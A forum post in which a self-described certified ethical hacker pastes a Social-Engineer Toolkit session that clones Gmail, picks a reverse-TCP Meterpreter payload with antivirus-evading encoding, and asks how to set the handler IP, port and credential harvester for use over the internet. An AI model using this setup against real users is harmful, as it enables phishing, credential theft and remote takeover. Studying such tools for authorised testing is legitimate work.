Hi, before i pose my query, I would like to introduce myself. I'm a CEH and ECSA for quite some time now. However I'm still learning and today I was just curious in understanding the routing on how SET is connected to the MSF.
Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to. Setting up JavaApplet in S.E.T:
1) Java Applet Attack Method
set:webattack>1
2) Site Cloner
set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: y
#####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***######
#####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n#######
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://gmail.com
[*] Cloning the website: https://gmail.com
[*] Malicious java applet website prepped for deployment
What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
set:payloads>2
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1) avoid_utf8_tolower (Normal)
16) Backdoored Executable (BEST)
set:encoding>16
#####set:payloads> PORT of the listener [443]:#####
[*] Generating x64-based powershell injection code...
FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.
SECOND: The Second line of code following, I seriously don't understand this. If I put in a Local Static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'Correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option Before this one? & why would it ask for my HANDLER's IP when it generates its own Handler? Please elaborate this option thank you.
THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?
LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester along side when they both are on different ports?
Thankyou